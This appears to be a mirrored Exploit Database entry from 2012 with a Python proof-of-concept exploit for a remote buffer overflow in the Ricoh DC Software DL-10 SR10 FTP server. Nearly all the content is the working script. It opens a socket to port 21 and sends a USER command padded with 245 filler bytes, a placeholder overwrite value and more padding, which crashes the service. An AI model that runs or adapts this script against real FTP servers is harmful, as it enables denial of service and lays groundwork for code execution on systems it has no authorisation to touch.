Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 – Remote Buffer Overflow

• Exploit Database
• 118 阅读

• 作者： Julien Ahrens
  日期： 2012-03-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18643/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  #!/usr/bin/python # Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability # Version: <= 1.1.0.6 # Date:2012-02-05 # Author:Julien Ahrens # Homepage:www.inshell.net # Software Link: http://www.ricohpmmc.com # Tested on: Windows XP SP3 Professional German # Notes: Capftpd (former SR-10) is vulnerable too # Howto: "Log file name" has to be set   import socket,sys import os   target="192.168.0.1" port=21   junk1 = "\x41" * 245 boom = "\x42\x42\x42\x42" junk2 = "\x43" * 50   payload = junk1 + boom + junk2   print "[*] Connecting to Target " + target + "..."   s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[*] Connected to " + target + "!" except: print "[!] " + target + " didn&apos;t respond\n" sys.exit(0)   s.recv(1024) print "[*] Sending malformed request..." s.send(&apos;USER &apos; + payload + &apos;\r\n&apos;)   print "[!] Exploit has been sent!\n" s.close()